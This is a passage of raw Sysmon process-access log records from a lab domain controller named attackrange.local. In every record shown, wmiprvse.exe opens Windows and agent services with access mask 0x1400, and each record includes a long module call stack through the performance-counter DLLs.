Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 